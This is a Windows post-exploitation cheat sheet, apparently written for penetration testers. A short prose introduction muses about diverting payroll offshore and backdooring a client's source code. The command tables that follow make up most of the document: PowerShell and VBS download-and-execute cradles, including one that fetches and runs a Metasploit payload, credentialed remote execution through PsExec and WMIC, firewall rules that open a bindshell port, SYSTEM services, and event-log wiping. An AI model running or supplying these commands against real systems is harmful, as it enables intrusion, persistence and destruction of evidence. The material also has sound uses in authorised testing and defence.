Authors: < nixawk >
Post exploitation is a critical component in any penetration test. This is where you differentiate yourself from the average, run-of-the-mill hacker and actually provide valuable information and intelligence from your penetration test. Post exploitation targets specific systems, identifies critical infrastructure, and targets information or data that the company values most and that it has attempted to secure. When you exploit one system after another, you are try- ing to demonstrate attacks that would have the greatest business impact.
When attacking systems in post exploitation, you should take the time to determine what the various systems do and their different user roles. For example, suppose you compromise a domain infrastructure system and you’re running as an enterprise administrator or have domain administrative-level rights. You might be king of the domain, but what about the systems that communicate with Active Directory? What about the main financial applica- tion that is used to pay employees? Could you compromise that system, and then, on the next pay cycle, have it route all the money out of the company to an offshore account? How about the target’s intellectual property?
Suppose, for example, that your client is a large software development shop that ships custom-coded applications to customers for use in manufac- turing environments. Can you backdoor their source code and essentially compromise all of their customers? What would that do to harm their brand credibility?
Post exploitation is one of those tricky scenarios in which you must take the time to learn what information is available to you and then use that infor- mation to your benefit. An attacker would generally spend a significant amount of time in a compromised system doing the same. Think like a malicious attacker—be creative, adapt quickly, and rely on your wits instead of auto- mated tools.
| Command | Description |
|---|---|
NET USE \\ip\ipc$ password /user:username |
Make a ipc connection with remote service, if successful, you can try to view, query, .... with the right privilege. |
NET USE z: \\ip\share$ password /user:username |
Map remote share as local drive z: |
systeminfo /S ComputerName /U username /P password |
This tool displays operating system configuration information for a local or remote machine, including service pack levels. |
tasklist /S SERVER /U DOMAIN\username /P password |
displays a list of currently running processes on remote machine. |
taskkill /S SERVER /U DOMAIN\username /P password |
kill an process in remote server. |
| powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))" | Execute code from remote server. |
| powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')" | Download a file from remote server. |
| powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1 | Execute test.ps1 on localhost |
bitsadmin /transfer systemrepair /download /priority normal http://path/to/file c:\path\local\file |
Create a job called systemrepair to download a file from remote server. |
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbscscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename |
Download File with vbs |
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbscscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt |
Dwonload and exec metasploit vbs payload. |
PsExec.exe \\192.168.206.145 -accepteula -u username -p password cmd.exe /c ver |
Run remote windows commands, and return results |
wmic /node:SERVER /user:DOMAIN\username /password:password process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt" |
Create a new process on remote server. No command results return. |
| Command | Description |
|---|---|
NETSH INTERFACE portproxy add v4tov4 listenport=LPORT connectaddress=RHOST connectport=RPORT [listenaddress=LHOST protocol=tcp] |
Transmit data from localport to remoteaddr:remoteport. |
| set http_proxy=http://your_proxy:your_port set http_proxy=http://username:password@your_proxy:your_port set https_proxy=https://your_proxy:your_port set https_proxy=https://username:password@your_proxy:your_port |
Use proxy in command prompt |
| Command | Description |
|---|---|
| NETSH FIREWALL show all | Show Allowed programs configuration for Domain/Standard profile. |
NETSH FIREWALL add allowedprogram C:\Windows\system32\cmd.exe cmd enable |
Add a program into firewall allowedprogram Whitelist. |
NETSH FIREWALL delete allowedprogram cmd |
delete a item from firewall allowedprogram Whitelist, you can also use a path to delete it. |
| NETSH FIREWALL show all | Show Port configuration for Domain/Standard. |
NETSH FIREWALL add portopening tcp 4444 bindshell enable all |
add tcp port 4444 into port Whitelist. |
| Command | Description |
|---|---|
sc create servicename type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start servicename |
Create malicious services, and gain local system privilege. |
| Command | Description |
|---|---|
net use \\IP\ipc$ password /user:usernameat \\ ComputerName time "command" |
The AT command schedules commands and programs to run on a computer at a specified time and date. net time [/domain] to show current time. |
| Command | Description |
|---|---|
| del %WINDIR%*.log /a /s /q /f | Deletes all *.log files from the %WINDIR% directory. |
| wevtutil el | Lists the different log files the system is keeping. |
| for /f %a in ('wevtutil el') do @wevtutil cl "%a" | Clears the contents of a specific log. |
| powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security | Clear specific event logs |